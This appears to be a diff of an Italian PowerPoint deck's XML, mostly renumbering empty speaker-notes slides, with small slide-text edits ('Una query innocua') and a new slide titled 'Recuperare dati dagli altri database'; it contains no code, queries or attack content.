-<file path=ppt/notesSlides/notesSlide37.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4697,7 +4955,111 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide38.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide40.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4824,7 +5186,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide39.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide41.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4951,111 +5313,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 115"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide40.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -5182,7 +5440,365 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide41.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide43.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FDB905-8F82-4E87-CD82-1B5D5F6ADC74}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30877F77-B7DE-DCF4-A73D-523B9E0B85F9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D374612-BA40-9FB0-D4BD-989FE5EB7628}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2881729070"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide44.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62815652-D1C9-7B05-6FB5-F5A00F08FE51}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010A47B2-AFE4-35AE-5ED8-31C1AF0EECB7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{153DC11C-6B7E-B065-4E3E-E18BFB3BCDA0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2027412347"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide45.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 166"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide46.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -5243,110 +5859,6 @@
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide42.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 166"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -16825,7 +17337,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
+              <a:t>Una query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -18366,6 +18886,393 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA00D75-EFF3-1640-CE37-BFCD9954B7FF}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C6A88EF-D502-802C-8A61-ED7FDB658E66}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>dati</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>dagli</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>altri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> database</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA60446D-BF41-D26F-5CF8-81594027249B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
